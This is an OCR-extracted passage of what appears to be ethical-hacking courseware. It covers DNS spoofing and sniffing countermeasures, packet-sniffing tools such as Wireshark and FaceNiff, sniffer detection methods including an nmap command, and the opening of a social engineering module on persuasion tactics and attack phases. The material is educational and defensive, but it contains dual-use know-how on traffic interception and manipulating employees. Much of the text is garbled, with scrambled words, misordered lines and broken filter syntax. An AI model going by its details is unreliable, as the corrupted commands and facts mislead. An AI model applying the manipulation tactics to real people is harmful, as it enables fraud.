+
(http://www.ettercap-project.org)
Ettercap
Evilgrade
(https://github.com)
TORNADO(https://github.com)
How to DefendAgainst
DNSSpoofing
Scare
ea
Socket
Layer
he (St forsnering tafe
‘Use
ONSNonExtentDoman
wows (HADOMAIN
Rate
oni eal torestr externaONSlookups Shel(SHeneption
se Secure
How to DefendAgainst
DNSSpoofing
MajorDNSimplementations
have reported
attacksusing DNSspoofing,
andthis vulnerability
still affectsa large
numberof organizations.
Thisis because
of a lackof information
when
performing
DNSqueries,whichallowsattackersto spoof
DNSresponses.
Youhaveseen how an
attacker typesof DNSspoofing
carries out different attacks.
We now look at how to defenda
networkfromthesetypesof attacks.
Countermeasures that helppreventDNSspoofing
attacks:
Implement Domain Name System Extension(DNSSEC)
Security
UseSecureSocketLayer
Resolve
(SSL)
all DNSqueriesto a localDNSserver
the
forsecuringtraffic
being
BlockDNSrequests sent to externalservers
Configure
a firewallto restrict externalDNSlookup
implement
an intrusion detectionsystem (IDS)
anddeploy it correctly
Configure
the DNS resolverto usea new random source portforeachoutgoing
query
Restrictthe DNSrecusingservice, either fullor partial,
to authorizedusers
UseDNSnon-existent domain(NXDOMAIN)
rate limiting
Secureyour internalmachines
UsestaticARPandIP tables,
UseSSHencryption
ical andCountermensores
Mackin ©by E-Comel
Copyright
Donot allowoutgoing
trafficto use UDPport$3 as a defaultsource port
Auditthe DNSserver regularly
to remove vulnerabilities.
Usesniffing
detectiontools
Do not opensuspiciousfiles,
use trustedproxysites
Always
Ifa companyhandles
i ts own resolver,
it shouldbe keptprivate
andwell protected
Randomize
source anddestinationIPaddresses
Randomize
Query1D
Randomize
case in the name requests
(Pk)to protecttheserver
Infrastructure
UsePublicKey
Maintaina single rangeof IPaddresses
or specific to login to the systems
Implement
packet
filtering
for bothinboundandoutboundtraffic
RestrictDNSzone transfersto a limitedset of IP addresses
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
2 oo
2 oo
Sonn
SniffingTools
administratorsu se automated
System tools to monitor theirnetwork,
but attackers
m isuse
thesetools to sniff networkdata. Thissection describestoolsthat an attackercan use for
sniffing,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tool:Wireshark
Sniffing
yu
capture
and
Wireshark
Source:https://www.wireshark.org
Wireshark letsyou capture andinteractively
browsethe trafficrunningon a computernetwork.
Thistool uses WinPcap to capturepacketson its own supported networks.It captureslive
networktrafficfromEthernet, IEEE802.11,PPP/HDLC, ATM,Bluetooth, USB,TokenRing, Frame
Relay, andFODInetworks.Thecaptured filescan be programmaticallyeditedvia thecommand-
line. Aset of filtersfor customizeddatadisplay
can berefinedusing a displayfilter.
attackersuse Wiresharkto sniffandanalyze
shownin the screenshot,
‘As the packet
flow i n the
targetnetworkandextract criticalinformationaboutthe target,
ical andCountermensores
Mackin ©by E-Comel
Copyright
St il ga i i
igre 8.52:
Capturing usingWireshark
packets
ical andCountermensores
Mackin ©by E-Comel
Copyright
FollowTCP Streamin Wireshark
ical andCountermensores
Mackin ©by E-Comel
Copyright
854:
Figure Wireshark
featureFollowTCP
ical
Steam
andCountermensores
Mackin ©by E-Comel
Copyright
Filters in Wireshark
Display
fitersare usedto change
Display the view of packets files
inthecaptured
| exami:typetheprotocol
inthe fer boxar, it, tp ud, dos,Fp
DisplayFilters in Wireshark
Source:https://wiki.wireshark.org
Wiresharkfeaturesdisplay filtersthat filter traffic on the targetnetwork byprotocol type,IP
address, filtersare usedto change
port,etc. Display
set up a filter,typethe protocol
ofWireshark.
Wireshark
the
view
of captured
files.
name, suchas arp, http,tcp,udp,
filtersat a time.
can use multiple
packetsi n the To
dns,and ip, i n the filter box
Ports
arp, http,tep,udp,
dns,ip
0 tep.port==23
0 ip.addr==192.168.1.100 machine
Ap.addr==192.168.1.100 && tcp.port=23
Filtering
Multiple
==
by IPAddresses
© Sp.adde 10.0.0.4 or ip.addr
©by==
FilteringIPAddress
ip.addr 10.0.0.4
OtherFilters
==
ip.dst
==
ip.addr
10.0.1.50
10.0.1.12
frame.number < 30
&& frame.pkt_len >
&& icmp 6& frame.number
400
> 15 6
ip.src==205.153.63.30or ip.dst==205.153.63.30
176 tical andCountermensores
Making by Comet
Copyright©
Additional WiresharkFilters
ply HT Treen
Dips ST pr 2] andOP te
Far
bya
(eS
and
eat
potecal er unwanted
Additional WiresharkFilters
Source:https://wiki-wireshark.org
Someexamples
of additionalWiresharkfiltersare listedbelow:
tep. flags. reset==1
Displays
all TCPresets
udp contains 33:27:58
Setsa filter for the hexvaluesof 0x330x270x58at anyoffset
http. request
Displaysall HTTPGETrequests
tep.analysis. retransmission
Displays
all retransmissionsinthe trace
tep contains traffic
Displays
all TCPpackets
that contain the word“traffic―
!(axp or icmp or dns)
Masksout arp,icmp,dns,
or other protocols
andallowsyouto view thetrafficof your
interest
tep.port
Setsa
==4000
filter for anyTCPpacket
with4000as a source or destinationport
ical andCountermensores
Mackin ©by E-Comel
Copyright
tep.port eq 25 or icmp
Displays
onlySMTP(port25)andICMPtraffic
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Displays
onlytraffic i n the LAN(192.168.x.x),
betweenworkstations
andservers—no
Internet
f
Ap.sre '=s0etse
Filtersbya protocol
(e.g,
SIP)
20000 £6 ip.dst
andfiltersout unwanted IPs.
= 200¢002002000 EE Sip
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools
Sniffing igEH
]
Sniffing
Tools (Cont'd)
CEH
|i
OmniPeck we omer Anaaer
reses ot f
on
Irpection
SniffingTools
=
SteelCentral Analyzer
Packet
Source:https://www.riverbed.com
SteelCentralPacketAnalyzer providesa graphical
consolefor high-speed
packet
analysis.
Thistool comes integratedwith Riverbed
AirPcapadapters
to analyze
and
troubleshoot802.11wirelessnetworks.
Modul
8 1179
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
terabytes
As it captures of packet
datatraversingthe network, thistoolreads
thattraffic
and displays it i n a graphical
user interface (GUI).It can analyze mult-gigabyte
recordingsfromlocally presented trace filesor on remote SteelCentral NetSharkprobes
(physical,
virtual,
or embedded on SteelHeads) without a largefile transfer,
to identify
anomalousnetworkissues or diagnose and troubleshoot complexnetworkand
applicationperformance issues downto the bit level
@O22%*
CBSie BBgy Otro Cerone
sce
©
Pron
:
Sey,
eg
Sard
+1
les
I
Sten ©
Sine
Ger
FaeEstherTie[0
eee) Tata
myRi]
Toten ed rena
peers |(Corot
{aetna dren
Sander
owe
mente ae «+ 45 WSD [ae tne Teale 65
Capsa
Analyzer
NetworkAnalyzer
Figure8.5:Screenshot
ofStelCentral
Packet
Source:https://www.colasoft.com
CapsaNetwork Analyzer
is a network-monitoring tool that captures
all the data
transmittedover the networkand provides a wide rangeof analysis
statistics in an
intuitive and graphic
way. Thetool helps andtroubleshootthe problem
to analyze that
ical andCountermensores
Mackin ©by E-Comel
Copyright
has (if
occurredany)
advancedprotocol analyzing,in-depth packet to
in the network.Itis alsoable perform
decoding,
It helpsyou to detectnetworkvulnerabilities.
reliablenetwork
forensics
andautomatic expertdiagnosis.
Se eI eer oe ET
OmniPeek
of
Figure856:Screenshot CasaNetwork Analyze
Source:https://www.liveaction.com
OmniPeekNetworkAnalyzer provides real-timevisibility
and expertanalysis
of each
partof the targetnetwork.Thistool will analyze, drill down,and fix performance
bottlenecksacross multiplenetwork segments. Analytic plug-ins
providetargeted
visualization
and searchabilitieswithin OmniPeek. TheGoogle Maps plug-in
enhances
the
analysis
of ofall
shows
window that Itpublic
a of
capabilitiesOmniPeek.
the locations
displaysGoogle
the
mapi n theOmniPeek
IPaddresses captured
capture
packets,
Attackerscan use OmniPeek to monitor andanalyze network trafficof the target
networkin real time,identifythe source locationof that traffic,
and attemptto obtain
as wellas findanynetworkloopholes.
sensitive information,
ical andCountermensores
Mackin ©by E-Comel
Copyright
857:Screenshot
Figure ofOmniPeok
Someexamples
of additionalsniffing
toolsare listedbelow:
Observer
Analyzer
PRTG
(https://www.viavisolutions.com)
(https://www.paessler.com)
NetworkMonitor
Deep
SolarWinds (https://www.solarwinds.com)
andAnalysis
PacketInspection
(https://www.xplico.org)
Xplico
PacketBuilder(hetps://www.colasoft.com)
Colasoft
ical andCountermensores
Mackin ©by E-Comel
Copyright
PacketSniffing
Toolsfor Mobile Phones
PacketSniffing
Tools for Mobile Phones
+
SnifferWicap
Source:https:/play.
google.com
Thistool is a mobilenetworkpacket
snifferfor ROOTARM droids.It workson rooted
Android
mobile
devices.
‘Attackers packets
can use thistool to capture for various typesof connections,
suchas
3G,andLTE,
Wi-Fi,
@
58:
Figure Sereenshat
ofSrifferWiap
Module
8 1182
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
FaceNiff
Source:http://faceniff
ponury.net
web session profiles
FaceNiffis an Androidapp that can sniffand intercept over a Wi-Fi
Thison
connection to a mobile. appworks rootedAndroid
shouldbe over open, WEP,WPA-PSK, or WPA2-PSK
devices. TheWi-Ficonnection
networkswhilesniffingthe sessions,
Packet
Capture
8
Figure59:Screenshot
ofFacet
Source:https://play.google.com
PacketCapture
is 2 networktraffic sniffer app with SSLdecryption.
It is a powerful
debugging
tool,especially
whendeveloping
an app.
Figure
860:of
Packet
Screenshot
ical
Capture
2 oo
ma
Sonn
Countermeasures
howan attackercarries out sniffing
The previoussection describes with differenttechniques
andtools.Thissection describescountermeasuresand possible
defensivetechniques usedto
sniffing
defenda targetnetworkagainst attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
Sniffing
Restrict access tothenetwork
physica media sir
t o ensue that packet cannotbe installed
Useend:
to-end to protecconfidential
encryption information
athe MACaddresofthegeteway
Permanenty cache
tothe ARP
Usesate
adresses entries
for
andARPtables attackers
t o prevent from adding
spoofed
ARP
Use
1Ps
of
intead Pv protocol
ssslons,
Useencrypted
of
FTF,
suchaSH insteadof Telnet,
Secure instead
(SCP)
Copy and SSLfor
se P P andS/MIME,
‘Shel
VPN,S 06, SSL/TLS
Sand Getine passwords
Secure
OTP)
Use theconcept
Siow acest
ofAccesContra (AC)12
nts fed rang oftse Ls
How to DefendAgainst Sniffing
Listedbeloware some ofthecountermeasuresto befollowedto defend sniffing
against
Restrict physical
accessto the networkmediato ensure that a packet
sniffercannot be
installed
‘=
Useend-to-end
encryption confidential
to protect information
Permanently
addthe MACaddressthe gateway
of
to theARPcache
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usestatic IP addresses the spoofed
andARPtablesto preventattackersfromadding
ARP in
entriesfor machines the network
and,if possible,
Turn off network identificationbroadcasts restrict the network to
authorizedusersto protectthe networkfrombeing with sniffing
discovered tools
UseIPv6insteadof IPv4
Useencrypted
sessions suchas SSHinsteadof telnet,SecureCopy (SCP)insteadof FTP,
andSSLforemailconnection to protectwirelessnetworkusersagainst
sniffingattacks
insteadof HTTPto protectusernamesandpasswords
UseHTTPS
of
Usea switchinstead the hub,as a switchdeliversdataonlyto the intendedrecipient
UseSecureFileTransferProtocol(SFTP)
insteadof FTPfor secure transferof files,
UsePGPandS/MIME, SSL/TLS,
VPN,IPSec, SSH, (OTP)
andone-time passwords
UsePOP2or POP3insteadof POPto downloademailsfromemailservers
UseSNMPv3insteadof SNMPv1andSNMPv2to manage networkeddevices
‘Always
encryptthe wirelesstrafficwith a strong protocol
encryption suchas WPA or
WPA2
RetrieveMACaddresses fromNICsinsteadof the OS;thisprevents
directly MACaddress
spoofing
Usetoolsto determine
if anyNICsare runningi n promiscuous
mode
Usethe concept of AccessControlList (ACL)
to allow accessonlyto a fixed rangeof
trustedIP addresses
i n a network
Change to complex
defaultpasswords passwords
broadcasting
‘Avoid SetIdentifiers)
$5IDs(Session
Implement
a MACfiltering
mechanismon yourrouter
Implement
networkscanningandmonitoringtoolsto detectmaliciousintrusions,
rogue
andsniffers
devices, connected
to thenetwork
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
2 oo
2 oo
eee
SniffingDetection Techniques
especially
It is very difficultto detect passivesniffers, whentheyare runningon a shared
Ethernet.Thissection discusses some sniffing
detectiontechniques.
8
Module 1188
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
How to DetectSniffing
‘Running
in RunNetworkTools
Promiscuous
Mode
(@Youneedtocheckwich
promiscuous
mode
Run
0S andsee
haschange
he MAC
(samplerouters
MACadaress)
(©
Runnetwork
9
tools
suchas
Analyer monitorh e
networkor detecting
strange
‘nd
read
packet
ha
each
network
its
arves about
wspicios actives
Enables
onscie,
you t o collect,
cortratae,ae
entirety nae rate dataacross
[es]
How to DetectSniffing
Itis not easyto detecta snifferon a networkas it onlycaptures dataand runs i n promiscuous
mode.Promiscuous modeallowsa networkdeviceto intercept and readeachnetworkpacket
that arrives in its entirety.Thesnifferleavesno trace as it does not transmit data.To find
sniffers,check for systems that are runningi n promiscuousmode, whichis an NIC modethat
allowsall packets (traffic)to passwithout validating their destinationaddress.Standalone
sniffersare difficultto detectbecause
methodhelps to detectnon-standalone not
theydo transmit datatraffic.Thereverse DNSlookup
sniffers.Thereare manytools,suchas Nmap, that are
availableto use
addresses
can detect sniffing
for
the detectionof promiscuous
of certain machineshavechanged
mode.Run IDS and note whetherthe MAC
(forexample, the router'sMACaddress). An IDS
activities on a network. It notifies or alertsthe administratorwhen a
suspicious activity,suchas sniffing or MAC spoofing, occurs. Networktoolssuchas Capsa
PortableNetworkAnalyzer monitor the networkfor strange packets suchas thosewith spoofed
addresses. Thistool can collect, consolidate, andanalyze
centralize, trafficdataacrossdifferent
networkresources andtechnologies.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SnifferDetectionTechniques:
PingMethod and DNSMethod ~—C|EH.
fa"
venta
oe *
Qenetineten
teases nmieseny
= = aa
wilitinn
1 ping
tote B
goonies
|@onlythe machineinthe
promiscuous mode (machine C
‘achestheARPinformation(P
mapping)
andMACadress
"Amachneinthepromiscuous
rose repondsothe ping
an
sillsend ARPprobe to
the source ofthe ping
ste oeteaneeset
identity
SnifferDetectionTechniques
Ping Method
To detect a sniffer on a network,identifythe systemon the network running i n
promiscuous mode.The ping methodis usefuli n detecting a systemthat runs i n
promiscuous mode, whichin turn helps
to detectsniffersinstalledon the network.
whereas the suspect
to
Justsenda pingrequestthe suspected
address.TheEthernetadapter
machine withits IPaddressandincorrect MAC
will rejectit becausethe MACaddressdoesnot match,
runningthe snifferresponds
machine to it, as it doesnot reject
packets
with a differentMACaddress. Thus, this responsewill identify the snifferi n the
network.
Figure8.61:
Promiscuous
mode
‘xamin beleamad Suspect
Machine
DNSMethod
The reverse DNSlookup of the DNSlookup
i s the opposite method.Sniffers using
reverse DNSlookup increase networktraffic.Thisincrease i n networktraffic can be an
indicationof the presenceof a snifferon the network. Thecomputers on thisnetwork
promiscuous
are i n
mode. or
Usersc an perform
a reverse DNSlookup remotely locally.Monitor theorganization’s
DNSserver to identify incomingreverse DNSlookups. Themethodof sending ICMP
requests to a non-existingIP addresscan also monitor reverse DNS lookups. The
computerperforming the reverse DNS lookup would respond to the ping, thus
asniffer.configure
identifyinghosting
it as
lookups,
For localreverse DNS the detectori n promiscuous mode.Sendan
ICMPrequest IPaddressandview the response.
to a non-existing If the system
receives
a the user can
response, identify
the responding
machineas performing
reverse ONS
lookups reverse DNSlookup
on the localmachine.A machinegenerating traffic will
most likely
be runninga sniffer.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ing >|
192.168.0.1)― Geep
ac: 00.16-2001.2345
Ping>Ela
(192.168.02) ONSLookup
>
Maccoobasetszed
Ping(192.168.0.3),
>|
a
Figure63:Sifingdetectionusing
theDNSmethod
Method
‘ARP
Thistechnique sendsa non-broadcast ARPto all the nodesin the network.Thenode
that runs in promiscuous modeon the networkwill cachethe localARPaddress. Then, it
will broadcast@pingmessage on thenetworkwith thelocalIPaddress buta different
MAC address. In this case,onlythe nodethat hasthe MAC address(cached earlier)will
be ableto respond to your broadcast ping request.A machinein promiscuous mode
replies to the ping message,as it hasthe correct informationaboutthe hostthat is
sending ping requests i n its cache;the remainingmachineswill sendan ARPprobe to
identify
running,
the source of the pingrequest.
will
This detectthe nodeon whichthe snifferis
“es
fD
renee wensea2
nonteaadet
a7 %
7)
864:
Figure
Detecting
sifing
method via the ARP
ical andCountermensores
Mackin ©by E-Comel
Copyright
PromiscuousDetectionTools
PromiscuousDetectionTools
+
Nmap
Source:https://nmap.org
Nmap's allowsyou to
NSEscript checkwhethera systemon a localEthernethasits
networkcardin promiscuous
mode.
Command
to detectNICi n promiscuousmode:
nmap --script=sniffer-detect [Target IP Address/Range
of IP
addresses]
ical andCountermensores
Mackin ©by E-Comel
Copyright
865: Nmap
Figure Screenshot
showing output
une
NetScanTools
Pro
Source:https://www.netscantools.com
NetScanToolsPro includesthe Promiscuous ModeScanner tool to scan your subnetfor
network interfaceslisteningfor all Ethernetpackets
i n promiscuous mode.Security
professionals
use NetScanTools Proto scan the subnetwith modifiedARPpackets and
identify
devicesresponding to eachtypeofARPpacket.
&66: ScreenshotofNetcanToos
Figure Pro
—
PromiscuousModeScanner
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
nth
>
module,
have we
protocols
wunerable
slong
snfingconcepts wth
decussed
thefolowing
ta snifingandvarious hardware
snifing
spoofingsuchas
aac,MACONCP
attacks,
Vorious techniques
ONS
attacks,
withthei countermeasires
ee. slong
p oisoning.
ARPpoleoning,
steal
Inthenextmodule,
we wildc
andpentesters,
performsci engineering
to eral formationrelated
othe
Module Summary
In thismodule, we havediscussed sniffing concepts alongwith protocols vulnerable to sniffing
andvarious hardwareprotocol analyzers.Wehavealsodiscussed various sniffing techniques,
suchas MACattacks, DHCP ARPpoisoning,spoofing
attacks, attacks,andDNSpoisoning,along
with their countermeasures.Thismodulealsoillustratedvarious sniffing tools.In this module,
we havealsodiscussed various countermeasuresto be employed to preventsniffing attacks.
Thismoduleendedwith a detaileddiscussion on various sniffing
detectiontechniques.
In the next module, i n detailhow attackers,
we will discuss as well as ethicalhackers andpen-
testers, perform
socialengineeringto steal criticalinformationrelatedto the target
organization.
ical andCountermensores
Mackin ©by E-Comel
Copyright
CEH |
Certified Ethical Hacker
Module09:
ale]
Maatelia\-i-1a
SYofei(o]
Module Objectives
Soll Engineering
Understanding Concepts
insider
Understanding Thveats
Understanding on Socal
Impersonation Networking
Ses
Diterent
Understanding Social Countermessues
Engineering
Understanding
OiferentInsiderThreats
andldentity
TheftCountermeasures
Module Objectives
moduleprovides
‘This Although
an overview of socialengineering. it focuseson fallaciesand
advocateseffectivecountermeasures, methodsof extracting
the possible informationfrom
anotherhumanbeing relyo n attackers’ Thefeaturesof thesetechniques
ingenuity. makethem
art, but the psychological nature of some of thesetechniques makesthema science. The
“bottom line―is that there is no ready defenseagainstsocialengineering;onlyconstant
Vigilance can circumvent somesocialengineering techniques
usedbyattackers,
Thismoduleprovides insight into human-based, computer-based, and mobile-basedsocial
engineeringtechniques.It alsodiscusses various insiderthreats impersonation
—
on social
networking theft,as well as possible
sites,identity countermeasures.
‘At engineering
+
willto
the endof thismodule,you
Describe
social
beable
concepts
‘+
Performsocialengineeringusingvarious techniques
Describe
+
insider threats
Performimpersonationon socialnetworking sites
Describe
identity
Apply
engineering
social
theft
countermeasures
Apply
knowledge
ofinsider
threatsandidentity
theftcountermeasures
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
0
2 Social
Engineering
TechalquesThott Hdentity
3) tnsidertireste Countermeasures
Social Engineering
Concepts
Thereis no single mechanism
security that can protectfromthesocialengineeringtechniques
used byattackers.Onlyeducating employees on how to recognize and respond to social
engineeringattackscan minimize attackers’ chances of success.Before
goingaheadwith this
module,i ts first necessaryto discuss
various socialengineering concepts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is SocialEngineering?
Soci
ergnesing
“6
isthe
convincing
people
reveala of to canfdentalinormation
that he fc peopl
are unre of he valuble hich theyhave
cess
= i
What is Social Engineering?
(Cont'd)
Factorsthat Make Companies Whyis SocialEngineering
‘Vulnerable
to Attacks Erfective?
security
Insufcen
traning
Uncegulated
accesso information
(security potas are strong theirweet
1 to
is ict dotetsail engineering
tempts
Lack
ofsecurty
polices 1 secrty
method
applied
to
ensure
Theresno
Complete
that canbe
fom sal eagnetingattacks
Theres
no
specie
(©
haraware sofware
ox
(efndagnint9 ol l engineerinack
to
Whatis SocialEngineering?
Beforeperforming information
a socialengineeringattack,the attackergathers about the
target fromvarious
organization sources suchas:
‘Theorganization's IDs,names,andemailaddresses
whereemployees’
officialwebsites,
are shared
ical andCountermensores
Mackin ©by E-Comel
Copyright
ofthetargetorganization
Advertisements mediarevealinformation
cast through such
as products
andoffers.
Blogs,
forums,andotheronlinespaceswhereemployees sharebasicpersonaland
organizational
information.
After gathering
information,
an attackerexecutes socialengineering attacksusing various
approaches piggybacking,
suchas impersonation, tailgating,
reverse social
engineering,and
othermethods
Socialengineeringis the art of manipulating people to divulge
sensitive informationto use it to
perform s ome malicious action. Despite securitypolicies, attackerscan compromisean
organization's sensitive informationbyusing socialengineering, whichtargets the weakness of
people, Most often,employees are not even aware of a security lapse o n their part and
inadvertently revealthe organization's criticalinformation.Forinstance, unwittingly answering
strangers’
questions or replying to spamemail
To succeed, attackerstake a special interest i n developing socialengineeringskillsand can be
so proficient that the victims might not even notice the fraud.Attackersalways lookfor new
waysto accessinformation, They alsoensure that theyknowthe organization’s perimeter and
the people on its perimeter, suchas security guards, and help-desk
receptionists, workers, to
exploithumanoversight. People haveconditionedthemselves to not beoverly suspicious,and
theyassociatespecific behaviorsandappearanceswith knownentities. Forinstance, a m an i n a
Uniform carryinga pileof packages fordelivery will beperceived as a delivery person.Withthe
helpof socialengineering tricks,attackerssucceedi n obtaining confidentialinformation,
authorization, and access detailsfrom people by deceiving and manipulating human
vulnerability
CommonTargets of SocialEngineering
Asocialengineerusesthe vulnerability
people
of humannature as theirmost effective
believeandtrust othersandderivefulfillmentfromhelping
are the most common targets
the needy.
ofsocialengineeringin an organization:
tool. Usually,
Discussed below
SystemAdministrators: is responsible
A systemadministratori n an organization for
Thus,theymayhavecriticalinformationsuchas the typeand
the systems,
maintaining
ical andCountermensores
Mackin ©by E-Comel
Copyright
version thatcouldbe helpful
of OSandadminpasswords, foran attackerin planning
an
attack.
Users andClients:Attackerscouldapproachusers andclientsof the target
organization,
pretending
to bea techsupport personto extractsensitive information,
Vendorsof the Target
Organization:
Attackersmay also targetthe vendorsof the
organization
to
gain
critical
that
could
information helpi n executing
Senior Executives:Attackerscould also approach
attacks.
senior executives from various
departmentssuchas Finance, HR,and CxOsto obtain criticalinformationabout the
organization
Impactof Social Engineering
Attack on an Organization
Socialengineeringdoesnot seem likea serious threat,
but it can leadto substantial
losses
for
organizations.
EconomicLosses:
of
Theimpactsocial engineeringattackon organizations
Competitors
include:
may use socialengineering techniques
to stealsensitive
information
suchas the development plansand marketing of the target
strategies
company,whichcan resulti n an economic loss.
to Goodwill: For
Damage an goodwill
organization, is importantfor attracting
customers. Socialengineeringattacksmay damage byleaking
that goodwill sensitive
organizational
Lossof Privacy:
data,
Privacy
is a major concern, especiallyfor bigorganizations.
If an
organizationis unableto maintain the privacyof its stakeholders
or customers,then
people can losetrust i n the companyand maydiscontinue their businessassociation
Consequently,
with the organization. the organizationcouldfacelosses.
Dangers
of Terrorism:Terrorismand anti-socialelementspose a threat to an
organization's
assets people
andproperty.
—
talk.―
Hetold m e to
that hecan start his
you andaskyou to sendthe
ConsensusoF SocialProof
Consensusor socialproof people usually
willing
refersto the factthat are to like things
or
dothat
other
things
people orthings
advantage bydoing
Attackerstake
like do.
ofthis likecreating
websites fake
and posting
testimonialsfrom users about the benefitsof certain products suchas anti-malware
{rogueware).Therefore, if users searchthe Internet to downloadthe rogueware,they
encounter these websitesand believe the forgedtestimonials.Further,if users
download
Scarcity
themalicious product, attackers
mayinstalla trojan
along
withit.
implies
Scarcity the state of beingscarce. In the context of socialengineering,
scarcity
oftenimpliescreating a feelingof urgencyin a decision-making process,Due to this
urgency,attackerscan controlthe informationprovided to victims and manipulatethe
decision-makingprocess.
whenApple
Forexample, releases product
a new iPhone thatsellsout andgoesout of
stock,
attackerscan take advantage
of this situation bysending
a phishing
emailto the
targetusers, encouragingthem to clickon a link provided
i n the emailto buythe
product. If the users clickon this link,theyget redirectedto some maliciouswebsite
controlledbythe attacker.As a result, the user might end up revealing their account
detailsor downloading some malicious programs suchas trojans.
Urgency
Urgency implies encouragingpeople to take immediate action. Attackersc an take
advantage of thisbytrickingvictims into performing unintendedtasks.
Forexample, ransomware often usesthe urgencyprinciple, whichmakesthe victim take
urgent action undera time-limit.Thevictims see the countdowntimer runningon their
infectedsystems andknowthat failure to makethe required decisionwithin the given
time can
Similarly,
the
loss
resulti n
data.
important of
phishing indicating
attackerscan send emails that a certain productis available
ical andCountermensores
Mackin ©by E-Comel
Copyright
tricked,andtheyclickon the link to takeimmediateaction. As a result,theyare
redirectedto a maliciouswebsite and end up revealing
their account details or
downloading
a virus file.
Familiarity
or Liking
whenthey or
Familiarity
liking implies
that people
a re askedbysomeone whomthey
likelyto buyproducts
are more likelyto be persuaded
that people
like.Thisindicates are more
if theyare advertisedbyan admiredcelebrity.
to dosomething
Greed
Some peopleare possessivebynature and seekto acquirevast amounts of wealth
through
illegal
activities. Socialengineerslure their targetsto divulge
informationby
promisingsomething
For example,
for nathing
an attacker
(appealing
maypretend
to
their
greed)
to bea competitor
andlure theemployees
of the
targetinto revealingcriticalinformationbyoffering
a considerable
reward.
Factorsthat Make Companies Vulnerable to Attacks
Manyfactorsmakecompanies some of them are as
vulnerableto socialengineeringattacks;
follows:
InsufficientSecurityTraining
Employees can beignorant aboutthesocialengineeringtricksusedbyattackersto lure
them into divulgingsensitive data about the organization.Therefore, the minimum
responsibility
ofanyorganization is to educatetheir employees
aboutsocial engineering
techniquesandthe threatsassociated withthemto preventsocialengineering attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Unregulated to Information
Access
Foranycompany,one of its main assetsis its database.Providingunlimitedaccessor
allowing
everyone access to such sensitive data mightcause trouble. Therefore,
companies must ensure propertraining of keypersonnel
for andsurveillance accessing
sensitive data,
SeveralOrganizational
Units
‘Some
organizations geographic
havetheirunits at different locations, making it difficult
to managethe system.
Further,this sort of setupmakesit easier for an attackerto
accessthe organization's
sensitive information.
Lackof Security Policies
Securitypolicy the foundationof securityinfrastructure.It is a high-level
i s document
describingthesecurity controls implemented An organization
i n a company. shouldtake
extreme measures related to every possible securitythreat or vulnerability.
Implementation of certain securitymeasures suchas password change policy,
informationsharing policy,accessprivileges,
uniqueuser identification,
andcentralized
prove to bebeneficial
security,
Whyis Social Engineering Effective?
Like
other
techniques, socialengineering doesnot dealwith networksecurity
dealswiththepsychological manipulation of ahumanbeing
issues;instead,
to extract desired
it
information,
Thefollowing are reasonswhy socialengineeringcontinuesto be effective:
=
Despite various security policies,
preventing socialengineering is a challengebecause
humanbeings are most susceptible
to variation,
It is challenging to detectsocialengineeringattempts. Socialengineeringis the art and
science of manipulating into divulging
people information.
complete
No methodguarantees fromsocialengineeringattacks.
security
No specific
hardware or software to safeguard
is available againstsocialengineering
attacks
Thisapproach
is relatively
(or
cheap free)andeasyto implement.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Phasesof a SocialEngineering
Attack
Researchthe TargetCompany
"©
Dumpster
diving,
websites,
employes,
SelectaTarget
ofcompany, tour the ee
frustrated
Identity
employees
the
target
company
Develop
a Relationship
© Develop eatonship
with the selectedemployees
Exploitthe Relationship
a
Phasesof SocialEngineering
Attackerstakethe following
steps
to
Attack
execute a successful
socialengineering attack:
+
Research the Target Company
Before attacking the targetorganization’s network, an attacker gathers enough
informationto infiltrate the system. Socialengineeringis one technique that helps in
extractinginformation.Initially, the attackerresearches basicinformationabout the
targetorganization, such as the nature of the business, its location,numberof
‘employees,
dumpster
and
other
facts.
diving,
the
company's
Whileresearching,
website,
browsing
the attackerindulges
andfinding
i n activities suchas
employee details.
Selecta Target
After finishingtheir research,the attackerselectsa targetfor extracting sensitive
information aboutthe organization. Usually,attackerstry to reachout to disgruntled
employees because theyare easier to manipulate.
Develop
a Relationship
their
accomplish task
the Relationship
Exploit
The attackerexploits
the relationship
and extracts sensitive informationabout the
organization's financeinformation,
accounts, technologiesin use, andupcoming plans.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
3) tnsidertireste Countermeasures
Social Engineering
Techniques
Attackersimplement techniques
various socialengineering sensitive information
to gather from
people that mighthelpthemto commit fraudor participate
or organizations i n othercriminal
activities.
This section dealswith various human-based, and mobile-basedsocial
computer-based,
engineering
techniques, for a betterunderstanding.
codedwith examples
ical andCountermensores
Mackin ©by E-Comel
Copyright
of SocialEngineering
Types
Sensitiveinformationgathered
Techniques: noernaton by ©
interaction
arose vie ©
eon Te
Information
‘Sensitive withthe help
i gathered ofmobile
apps
of SocialEngineering
‘Types
In a socialengineering attack,
the attackeruses their socialskillsto trick the victim into
disclosing
personal
information
suchas creditcardnumbers, andphone
bankaccountnumbers,
numbers,
or confidentialinformationabouttheir organization
or computer Attackers
system.
use thisdatato either launchan attack or to commit fraud. Socialengineeringattacksare
categorized
into threecategories: human-based, computer-based, andmobile-based
Human-based
Social
Human-based Engineering
=
attacker can
‘An perform
human-basedsocialengineeringbyusing the following
techniques
© Impersonation Tailgating
Vishing Diversion Theft
Eavesdropping
Surfing
Shoulder >
HoneyTrap
Baiting
DumpsterDiving QuidProQuo
SocialEngineering
Reverse Elicitation
Piggybacking
ical andCountermensores
Mackin ©by E-Comel
Copyright
Computer-based
SocialEngineering
Computer-based
socialengineeringrelieson computers
andInternet systems
to carry
out
The
the targeted
following
action.
Phishing
‘Spam mail
0
©
Pop-up
attacks
window
Scareware
©
chat
Instant messenger
‘Mobile-based
SocialEngineering
